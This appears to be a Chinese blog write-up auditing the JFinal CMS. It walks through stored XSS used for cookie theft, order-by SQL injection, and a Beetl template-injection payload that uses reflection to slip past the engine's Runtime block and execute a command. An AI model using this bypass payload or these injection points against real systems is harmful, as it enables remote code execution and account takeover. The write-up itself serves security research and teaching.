这篇文章最下面怎么乱掉了?直接显示html代码,不显示内容了
环境搭建
首先就是源码的下载
之后只需要配置一下Mysql数据库相关的配置就能够启动CMS
我们首先使用idea工具打开该项目源码, idea将会自动加载依赖
之后我们将sql/jfinal_cms_v4.sql
中的数据库结构进行配置
我这里修改了一下,在前面加入了create database jfinal_cms; / use jfinal_cms;
这两条命令,可以直接将sql代码放入navicat进行运行配置
或者可以采用在mysql命令行创建库名之后使用source
命令进行加载
最后就是配置Tomcat运行
源码分析
架构
我们首先关注一下该CMS的技术选择
- web框架:JFinal
- 模板引擎:beetl
- 数据库:mysql
- 前端:bootstrap框架
我们同样可以编写一个小工具针对pom.xml中的依赖,从maven仓库中探测处每一个依赖是否是具有漏洞的版本
审计
这里我们采用黑盒和白盒相结合的方法进行审计
我们从白盒角度考虑首先从后台管理开始寻找脆弱点(因为一般的系统,后台总是比主页更加脆弱)
关于admin的源码,可以定位到com.jflyfox.modules.admin
包下
在其中的AdminController
类中
其路由为/admin
,默认页面调用了index
方法,初次登陆,将会调用reader
方法进行/pages/admin/login.html
页面的渲染
这里的reader
方法也就是调用了com.jfinal.core.Controller
抽象类下的render
方法,使用配置的模板引擎进行渲染操作
对于该项目的模板引擎的配置可以定位到com.jflyfox.component.config.BaseConfig
类中的configConstant
方法
可以知道配置的是Beetl
这个模板引擎进行渲染
如果我们更深一层,这个Config类又是如何进行调用的呢?
主要是因为这个方法是实现了JFinalConfig
类的方法,而在com.jfinal.core.Config
类中的configJFinal
方法是存在JFinalConfig类的方法调用的
包含有
- constant
- interceptor
- route
- plugin
- engine
- handler
这些配置
而对于这些的配置,是在JFinal框架初始化的时候进行配置的,也即是在com.jfinal.core.JFinal
类中的init方法中
而对于init方法的调用主要是通过JFinalFilter
这个Filter类来进行调用的
即也是通过在web.xml中进行该过滤器的配置进行添加的
上面主要是通过简单的分析了一下模板引擎的由来,来对项目结构进行熟悉,仅仅是一个小例子
所谓"知己知彼", 对项目的足够的熟悉,对于项目的漏洞挖掘来说也是不可或缺的一个重要部分
XSS1
在这个CMS中,针对XSS的防护几乎为零
在后台管理中,就是几乎没有任何的防御错误,各种的存储型XSS层出不穷,几乎是有框就有XSS
举几个例子
在注册一个用户的时候
如果在这些位置能够插入XSS payload就好了
但是经过尝试,不能够直接插入payload,会有格式的错误
我们看看是如何进行验证的
对应的Controller
为RegistController
类
这里将会使用beelt模板引擎对template/bbs/regist/show_regist.html
文件进行渲染
这里存在有一个注册表单,点击注册,将会触发onclick
事件,调用oper_save
方法
也即是调用了同目录下的show_regist.js
文件中的方法
这里存在多个判断条件,但是这里也仅仅是前端进行验证,我们可以通过抓包进行修改绕过这些验证,直接插入payload
虽然在后端也有着一定的限制,定位到RegistController#save
方法中
这里并没有类似于js验证中对于邮箱的严格的正则过滤,所以我们可以通过抓包修改email的值,形成存储型XSS
当admin用户,进入后台管理的时候,将会在其首页中执行js代码
通过这种方式窃取cookie
XSS2
不同于前面直接在创建用户的位置插入payload
同样首先可以创建一个普通的用户,之后在该用户的基本信息设置位置插入payload
这里定位到后端代码就是com.jflyfox.modules.front.controller.PersonController
类中
如果想要更改数据,根据show_person.js
中的逻辑,主要是调用了PersonController#save
方法进行信息的更新
在save方法中,并没有对用户的输入进行限制,直接就调用了model.update
方法进行更新
在update方法中
前面一部分是用来sql语句
之后在后面建立连接,调用Db.update
进行更新
也就成功将我们的输入存入了数据库中,形成了存储型XSS,因为这里是采用预编译的方式进行update操作,所以不存在sql注入的风险
我们可以随便找到一篇文章,进行评论,当访问主页的时候将会导致js代码执行
XSS3
上面两个都是后台操作的
该CMS对前端进行一定的XSS过滤操作
在任意一篇文章中的登陆框中插入payload
发现,这里是被转义了的,但是是否是完整的过滤,我们看看后端代码
我们可以定位到CommentController#save
方法中,该方法是对评论保存的具体逻辑
主要是调用CommentService#saveComment
方法进行保存,可以跟进一下
这里对XSS的处理,首先是JFlyFoxUils#delScriptTag
方法
这里的作用是,删除掉script / style
标签
之后就是调用commons-lang的escapeHtml方法来进行实体编码
然而,攻击者仍有可能利用一些漏洞来绕过escapeHtml方法的检查。下面是一些常见的绕过方法:
1, 利用HTML实体名称的漏洞:攻击者可能会使用HTML实体名称的漏洞来绕过escapeHtml方法。
2, 利用Unicode编码的漏洞:攻击者可能会使用Unicode编码的漏洞来绕过escapeHtml方法。
此外,攻击者还可能会使用HTML注释的漏洞、HTML属性的漏洞等来绕过escapeHtml方法的检查。
SSTI
这里既然使用了一个模板引擎进行渲染,使用的是beetl,没怎么使用过这种引擎,学习一下,看看是否具有SSTI的漏洞的产生
他的官方文档地址在
https://www.kancloud.cn/xiandafu/beetl3_guide
我这里简单记了一些相关关键的内容
基本的模板语法
模板的配置
默认配置在/org/beetl/core/beetl-default.properties 里,Beetl首先加载此配置文件,然后再加载classpath里的beetl.properties,并用后者覆盖前者。配置文件通过Configuration类加载,因此加载完成后,也可以通过此类API来修改配置信息
下面是一些需要关注的配置
# 指定占位符
DELIMITER_PLACEHOLDER_START=${
DELIMITER_PLACEHOLDER_END=}
# 指定定界符
DELIMITER_STATEMENT_START=<%
DELIMITER_STATEMENT_END=%>
# 字符集
TEMPLATE_CHARSET = UTF-8
# 指定本地Class调用的安全策略
NATIVE_SECUARTY_MANAGER= org.beetl.core.DefaultNativeSecurityManager
定界符和占位符
默认为
<%
var a = 2;
var b = 3;
var result = a+b;
%>
hello 2+3=${result}
同样可以自定义定界符和占位符
注释
//
/**/
属性
使用
${xxx.name}
如果为数组或者List,
${user[0]}
需要知道Java集合,数组长度,统一用虚拟属性
~size
来表示var list=[1,2,3]; var size = list.~size
函数调用
- print 打印一个对象 print(user.name);
- json,将对象转成json字符串,如 var data = json(userList) 可以跟一个序列化规则 如,var data = json(userList,"[*].id:i"),具体参考 https://git.oschina.net/xiandafu/beetl-json
- decode 一个简化的if else 结构,如 decode(a,1,"a=1",2,"a=2","不知道了"),如果a是1,这decode输出"a=1",如果a是2,则输出"a==2", 如果是其他值,则输出"不知道了"
- flush 强制io输出。
- pageCtx ,仅仅在web开发中,设置一个变量,然后可以在页面渲染过程中,调用此api获取,如pageCtx("title","用户添加页面"),在其后任何地方,可以pageCtx("title") 获取该变量
- type.new 创建一个对象实例,如 var user = type.new("com.xx.User"); 如果配置了IMPORT_PACKAGE,则可以省略包名,type.new("User")
- type.name 返回一个实例的名字,var userClassName = type.name(user),返回"User"
- global 返回一个全局变量值,参数是一个字符串,如 var user = global("user_"+i);
- cookie 返回指定的cookie对象 ,如var userCook = cookie("user"),allCookies = cookie();
安全输出
如果变量为空,不进行输出
可以在变量引用后加上
!
以提醒beetl这是一个安全输出的变量,变量确实有可能不存在如
${user.wife.name! }
,即使user不存在,或者user为null,或者user.wife为null,或者user.wife.name为null beetl都不将输出可以在!后增加一个常量(字符串,数字类型等),或者另外一个变量,方法,本地调用,作为默认输出,譬如:
${user.wife.name!"单身"}`,如果user为null,或者user.wife为null,或者user.wife.name为null,输出`单身
调用Java方法和属性
${@user.getMaxFriend(“lucy”)}
${@user.maxFriend[0].getName()}
${@com.xxxx.constants.Order.getMaxNum()}
${@com.xxxx.User$Gender.MAN}
<%
var max = @com.xxxx.constants.Order.MAX_NUM;
var c =1;
var d = @user.getWife(c).getName();
%>
可以调用instance的public方法和属性,也可以调用静态类的属性和方法 ,需要加一个 @指示此调用是直接调用class,其后的表达式是java风格的。
- GroupTemplate可以配置为不允许直接调用Class以增强安全性,具体请参考配置文件.
- 也可以通过安全管理器配置到底哪些类Beetl不允许调用,具体请参考高级用法。默认情况,
java.lang.Runtime
,和java.lang.Process
不允许在模板里调用。你自己的安全管理器也可以配置为不能直接访问DAO类(避免了以前 JSP 可以访问任意代码带来的危害)
自定义安全管理器
所有模板的本地调用都需要通过安全管理器校验,默认需要实现NativeSecurityManager 的public boolean permit(String resourceId, Class c, Object target, String method) 方法
如下是默认管理器的实现方法
public class DefaultNativeSecurityManager implements NativeSecurityManager{
@Override
public boolean permit(String resourceId, Class c, Object target, String method){
if (c.isArray()){
//允许调用,但实际上会在在其后调用中报错。不归此处管理
return true;
}
String name = c.getSimpleName();
String pkg = c.getPackage().getName();
if (pkg.startsWith("java.lang")){
if (name.equals("Runtime") || name.equals("Process") || name.equals("ProcessBuilder")
|| name.equals("System")){
return false;
}
}
return true;
}
}
在这个CMS中,存在有很多地方进行了渲染操作,举个例子,就是在用户的个人信息页面
这里存在有模板渲染的处理
在备注这个输入点,CMS没有任何过滤就进行了渲染
这里的模板语法是获取model
中的remark值,如果这个值不存在将会使用空字符串替代
我们这里按照其他模板引擎的数据,将备注修改为了${4+4}
,但是在渲染之后并没有执行这个模板语法,也即是渲染出4这个值
转而显示的是${4+4}
这个字符串
这里就和我们之前学习的freemarker
这个模板引擎很相似,同样利用的点是在模板语法本身,不同于velocity等引擎,如果直接渲染用户输入payload将会被转码而失效
所以这里的利用场景应该和freemarker
一样,为上传点或者修改模板文件点,接下来我们寻找该CMS的上传位置
仔细看了一圈,前台并没有什么上传点,之后选择看看后台
这里存在有一个模板管理的功能
这里能够编辑模板,我们可以在这里对模板文件进行编辑
添加上我们的payload
${@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",
@java.lang.Class.forName("java.lang.String")).invoke(
@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null),"calc")}
当我们使用这个模板的时候将会触发这个payload
这里解释一下这个payload的构造
根据前面我们对beelt的了解,我们知道它内置了一个调用本地Class的安全策略
# 指定本地Class调用的安全策略
NATIVE_SECUARTY_MANAGER= org.beetl.core.DefaultNativeSecurityManager
我们跟进这个类,在其permit
方法中存在有限制操作
return !pkgName.startsWith("java.lang") || !className.equals("Runtime") && !className.equals("Process") && !className.equals("ProcessBuilder") && !className.equals("System");
默认是不能够直接进行系统调用的,我们这里利用的是Java的反射机制,结合beelt的模板语法构造恶意payload
SQL
在前端中几乎所有的数据库交互都是使用的Jfinal框架中的接口,使用的是预编译的方法,有效避免了SQL注入的产生,但是在后台中存在有大量的SQL注入,未经过滤就和sql语句进行拼接,造成了SQl注入的产生
举个例子
在admin后台中
在查看素材的时候,将会调用ImageShowController
类中的list
方法
这里直接将获取的orderBy值和sql语句进行了拼接
造成了Mysql数据库的order by注入
这里我使用了updatexml
语句进行报错注入
其他位置还有很多,触发原因都是类似的